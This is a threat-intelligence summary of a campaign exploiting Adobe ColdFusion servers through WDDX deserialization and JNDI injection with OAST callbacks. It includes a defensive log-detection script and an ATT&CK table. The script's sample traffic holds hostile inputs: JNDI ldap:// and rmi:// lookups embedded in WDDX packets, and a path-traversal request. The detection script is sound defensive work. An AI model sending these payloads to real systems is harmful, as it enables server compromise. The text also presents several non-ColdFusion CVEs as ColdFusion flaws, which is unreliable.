EXECUTIVE SUMMARY:
A widespread exploitation campaign was observed targeting Adobe ColdFusion servers during a period of likely reduced monitoring, leveraging a broad cluster of known vulnerabilities to probe and compromise exposed systems. The activity focused on weaknesses including CVE-2016-6195, CVE-2002-1131, CVE-2013-2251, CVE-2013-2134, CVE-2010-2035, CVE-2022-47945, CVE-2018-11776, CVE-2023-26359, CVE-2023-38205, CVE-2023-44353, CVE-2023-38203, CVE-2023-38204, CVE-2023-29298, CVE-2023-29300, CVE-2023-26347 and CVE-2023-44352, indicating systematic abuse of both legacy and recently disclosed flaws. The exploitation activity was concentrated around major holiday downtime and appears to be part of a larger, automated initial access broker operation that scans and exploits exposed web application platforms at scale. The campaign further employed coordinated callback mechanisms to validate successful vulnerability triggers, enabling rapid confirmation of compromised infrastructure.
Threat activity originated primarily from a pair of infrastructure hosts that generated thousands of requests against ColdFusion instances, cycling through more than ten distinct vulnerabilities from recent ColdFusion advisories. The exploitation leveraged JNDI LDAP injection via WDDX deserialization, enabling out-of-band callback verification through OAST domains to confirm exploit execution. Payloads included remote code execution vectors, local file inclusion attempts, arbitrary file read operations, and gadget chain triggers, with most callbacks using structured Interactsh domains to track responses. Targeting was global in scope, with traffic directed at systems in multiple countries and evidence of secondary actors contributing minimal additional requests. Indicators such as JA4 network fingerprints and a large set of unique callback domains further characterize the automated nature of the scanning and exploitation traffic.
This campaign underscores the ongoing risk posed by unpatched application servers like ColdFusion and the value of proactive monitoring and patch management. Organizations running ColdFusion should ensure that all relevant security updates for known vulnerabilities are applied and that effective network and application protections are in place to detect and block both scanning and exploitation attempts. Additionally, defenders should consider enriching detection rules for deserialization and JNDI-based vectors, incorporating indicators such as malicious callback domains and offending IPs into boundary defenses, and continuously auditing for unexpected out-of-band interactions indicative of successful compromise.
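As an added illustration of the detection enrichment recommended above (example code written for this summary, not part of the original report), the script below flags ColdFusion requests that combine a WDDX body with a JNDI lookup URI, that reference Interactsh-style OAST callback domains, or that contain path traversal, and then aggregates flagged requests and unique callback domains per source IP. The `classify` and `summarize` functions, the list of Interactsh domain suffixes, and all sample traffic are assumptions constructed for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Interactsh OAST suffixes (assumption: public defaults; extend from your own telemetry).
OAST_SUFFIXES = tuple("." + d for d in ("oast.fun", "oast.pro", "oast.live",
                      "oast.site", "oast.online", "oast.me", "interact.sh"))
WDDX = re.compile(r"<wddxPacket", re.I)                      # serialized WDDX body
JNDI = re.compile(r"(?:jndi:)?(?:ldaps?|rmi|dns)://", re.I)  # JNDI lookup URI
HOSTS = re.compile(r"(?:https?|ldaps?|rmi|dns)://([A-Za-z0-9.-]+)", re.I)
TRAVERSAL = re.compile(r"\.\.[\\/]")                         # ../ or ..\ in path

def classify(path, body):
    """Return reasons a request looks like campaign traffic ([] if none)."""
    path = unquote_plus(path)             # decode URL encoding before matching
    text = path + "\n" + unquote_plus(body)
    reasons = []
    if WDDX.search(text) and JNDI.search(text):
        reasons.append("wddx_jndi_injection")  # deserialization -> JNDI lookup
    callbacks = {h.lower() for h in HOSTS.findall(text)
                 if h.lower().endswith(OAST_SUFFIXES)}
    if callbacks:
        reasons.append("oast_callback:" + ",".join(sorted(callbacks)))
    if TRAVERSAL.search(path):
        reasons.append("path_traversal")       # LFI / arbitrary file read attempt
    return reasons

def summarize(requests):
    """Count flagged requests per source IP and collect its unique callback
    domains, the two signals the report uses to characterize the scanner."""
    hits, domains = Counter(), defaultdict(set)
    for src, path, body in requests:
        reasons = classify(path, body)
        if reasons:
            hits[src] += 1
        for r in reasons:
            if r.startswith("oast_callback:"):
                domains[src].update(r.split(":", 1)[1].split(","))
    return {ip: {"flagged": n, "callback_domains": sorted(domains[ip])}
            for ip, n in hits.items()}

# Constructed traffic: two scanner hosts (RFC 5737 test addresses), one benign request.
SAMPLE = [
    ("203.0.113.10", "/CFIDE/sample.cfc?method=demo",
     "arg=%3CwddxPacket+version%3D%271.0%27%3E%3Cdata%3E%3Cstring%3Eldap%3A%2F%2Fc3ab8ff1.oast.fun%2Fx%3C%2Fstring%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E"),
    ("203.0.113.10", "/cf_scripts/x/..%2F..%2Fconfig.xml", ""),
    ("198.51.100.7", "/CFIDE/sample.cfc?method=demo",
     "<wddxPacket version='1.0'><data><string>rmi://d9e1f2.oast.pro/y</string></data></wddxPacket>"),
    ("192.0.2.5", "/index.cfm?page=home", ""),
]
```

Running `summarize(SAMPLE)` attributes two flagged requests and one callback domain to the first scanner host and one flagged request to the second, while the benign request is not reported; feed it tuples of (source IP, path, body) from your web server or WAF logs and forward the unique callback domains to DNS and egress monitoring.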
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | — |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Execution | T1203 | Exploitation for Client Execution | — |
| Persistence | T1133 | External Remote Services | — |
| Persistence | T1505.003 | Server Software Component | Web Shell |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials in Files |
| Discovery | T1083 | File and Directory Discovery | — |
| Discovery | T1046 | Network Service Discovery | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1090.003 | Proxy | Multi-hop Proxy |
| Impact | T1499.003 | Endpoint Denial of Service | Application Exhaustion Flood |
REFERENCES:
The following reports contain further technical details: